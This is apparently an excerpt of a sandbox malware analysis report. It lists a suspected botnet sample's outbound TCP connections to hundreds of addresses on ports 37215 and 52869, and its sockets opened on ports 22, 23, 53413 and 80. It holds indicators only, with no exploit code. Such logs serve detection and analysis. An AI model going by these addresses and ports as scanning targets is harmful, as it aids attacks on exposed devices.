    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.160.25.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.90.237.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.134.169.75:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.110.200.124:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.235.41.231:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.115.212.153:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.162.78.28:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.175.167.13:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.155.187.216:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.180.82.98:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.110.133.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.134.4.195:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.245.38.93:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.204.116.3:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.46.196.164:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.39.251.56:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.130.0.101:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.69.47.98:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.77.144.200:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.184.164.4:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.58.184.3:37215
    Source: global trafficTCP traffic: 192.168.2.23:41604 -> 37.0.9.202:45
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.242.220.138:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.74.21.8:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.177.185.138:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.129.58.180:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.151.190.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.207.122.68:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.21.105.249:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.212.90.7:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.179.201.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.137.88.207:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.113.240.87:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.19.206.230:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.123.129.53:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.228.90.85:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.58.14.46:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.19.224.148:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.250.81.103:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.225.221.51:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.157.60.145:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.209.238.80:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.211.134.133:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.34.166.97:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.232.204.119:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.98.213.45:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.78.200.210:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.198.98.181:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.65.149.142:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.142.238.47:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.211.157.244:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.7.182.37:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.162.118.153:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.94.30.204:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.243.157.93:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.40.56.230:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.60.77.151:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.182.20.173:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.141.27.185:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.97.248.245:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.158.20.0:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.176.115.81:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.232.183.22:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.25.208.132:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.255.134.52:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.18.248.205:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.90.99.32:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.112.14.93:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.177.12.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.4.240.216:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.235.162.97:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.108.57.238:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.167.141.10:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.34.148.91:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.38.118.8:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.126.253.71:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.123.105.240:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.69.247.190:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.177.23.131:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.26.32.121:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.178.136.163:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.4.24.120:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.197.229.242:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.66.168.237:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.37.120.86:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.157.32.232:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.12.234.176:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.76.213.97:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.140.242.123:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.112.113.63:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.11.74.233:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.25.138.36:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.111.58.241:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.123.217.95:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.21.46.30:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.128.42.63:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.42.149.125:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.172.122.21:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.9.191.13:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.153.201.208:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.37.54.80:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.237.154.138:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.254.99.65:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.221.27.145:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.134.244.241:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.200.181.145:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.57.107.113:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.245.15.106:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.82.114.254:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.18.225.231:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.216.141.246:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.163.163.158:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.195.68.220:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.140.26.111:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.16.102.46:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.198.2.154:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.103.82.207:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.194.185.247:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.156.121.0:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.94.135.51:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.108.83.66:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.118.3.109:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.254.125.216:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.252.150.217:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.87.230.245:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.120.172.83:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.65.180.36:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.83.240.63:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.144.200.83:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.5.106.143:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.223.108.91:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.65.128.159:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.206.5.223:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.182.214.200:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.12.156.54:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.140.21.230:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.222.37.103:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.160.44.43:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.18.240.130:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.36.178.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.69.192.231:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.187.52.240:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.216.55.135:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.135.207.38:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.120.209.107:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.111.159.183:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.158.174.127:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.21.201.40:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.17.185.106:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.197.6.103:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.69.11.224:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.23.54.206:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.101.162.239:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.180.210.203:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.123.151.17:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.80.50.239:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.166.124.45:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.36.238.179:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.87.121.15:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.147.154.143:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.166.221.84:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.30.158.180:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.176.157.251:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.196.99.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.121.216.184:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.113.126.34:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.39.231.172:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.226.19.190:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.198.95.238:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.107.71.81:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.253.29.204:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.123.200.208:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.180.147.56:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.181.80.109:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.27.251.74:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.145.13.203:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.172.29.245:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.233.171.237:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.211.97.50:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.211.12.216:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.200.170.30:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.255.138.176:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.9.71.41:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.107.18.75:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.182.176.126:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.16.206.124:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.224.11.115:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.226.238.183:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.142.245.199:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.229.253.170:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.170.200.53:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.148.13.173:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.47.195.190:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.90.192.34:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.158.124.135:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.98.240.233:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.202.178.185:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.86.231.146:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.26.225.55:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.252.165.57:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.4.85.72:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.153.62.28:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.197.0.71:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.60.255.196:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.16.159.88:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.0.236.42:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.229.185.13:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.22.166.47:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.122.7.103:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.58.203.67:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.15.4.214:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.30.170.62:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.121.127.114:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.134.52.186:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.8.91.16:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.254.199.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.188.58.95:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.64.248.73:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.37.75.234:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.57.97.186:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.134.91.144:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.3.80.145:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.37.202.25:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.202.97.173:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.38.230.156:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.216.232.80:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.146.185.216:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.229.89.35:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.131.150.113:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.96.221.233:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.144.0.22:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.20.35.178:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.87.127.84:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.161.195.213:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.195.178.115:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.108.78.127:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.83.118.87:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.228.138.213:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.129.151.107:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.134.171.34:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.71.178.252:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.106.250.13:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.110.229.234:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.238.242.114:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.40.205.88:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.70.79.24:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.47.11.41:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.59.248.255:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.58.53.25:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.15.144.179:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.233.223.123:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.174.174.71:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.18.154.96:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.105.89.79:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.103.68.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.255.56.63:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.12.37.67:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.2.107.138:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.66.9.63:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.92.174.152:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.36.19.102:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.74.10.125:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.173.229.250:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.146.172.166:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.217.79.86:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.116.122.13:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.80.236.232:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.230.174.60:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.216.170.37:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.251.167.205:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.218.77.100:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.42.140.223:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.230.236.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.56.248.185:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.194.151.108:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.103.43.226:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.95.187.116:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.60.57.87:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.172.199.237:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.229.231.86:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.102.233.110:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.133.122.213:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.4.208.65:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.240.134.177:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.4.114.91:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.87.16.196:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.47.7.198:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.85.87.123:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.155.3.125:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.113.73.187:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.173.113.22:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.163.135.144:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.32.20.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.19.73.142:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.109.57.162:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.233.94.249:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.1.210.168:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.241.40.103:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.180.197.48:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.223.64.247:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.254.249.173:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.233.2.101:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.148.173.24:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.160.111.228:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.14.64.66:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.110.160.101:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.212.39.97:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.36.81.27:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.87.65.212:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.155.168.12:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.122.33.166:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.64.19.66:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.129.21.48:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.25.101.123:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.18.224.53:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.103.99.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.182.50.14:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.101.176.200:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.77.180.80:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.29.54.201:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.83.72.154:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.218.42.250:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.83.186.101:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.10.92.239:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.32.253.64:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.174.81.185:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.192.170.222:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.195.100.228:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.188.176.110:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.32.18.192:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.159.16.87:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.93.75.173:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.91.167.31:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.44.43.68:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.95.182.0:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.175.189.222:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.68.138.216:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.156.84.137:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.62.154.92:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.92.232.144:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.248.238.11:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.25.126.14:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.129.235.132:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.215.131.112:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.8.231.244:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.44.243.230:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.245.60.33:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.8.209.52:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.3.33.115:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.100.199.168:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.126.151.155:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.63.140.158:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.189.106.50:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.9.215.88:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.110.249.47:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.201.61.31:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.116.180.118:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.106.68.74:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 45.239.84.62:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 185.155.232.250:52869
    Source: global trafficTCP traffic: 192.168.2.23:18046 -> 91.221.196.173:52869
    Source: /tmp/KHSQ48GkGn (PID: 5240)Socket: 0.0.0.0::22
    Source: /tmp/KHSQ48GkGn (PID: 5240)Socket: 0.0.0.0::23
    Source: /tmp/KHSQ48GkGn (PID: 5240)Socket: 0.0.0.0::53413
    Source: /tmp/KHSQ48GkGn (PID: 5240)Socket: 0.0.0.0::80
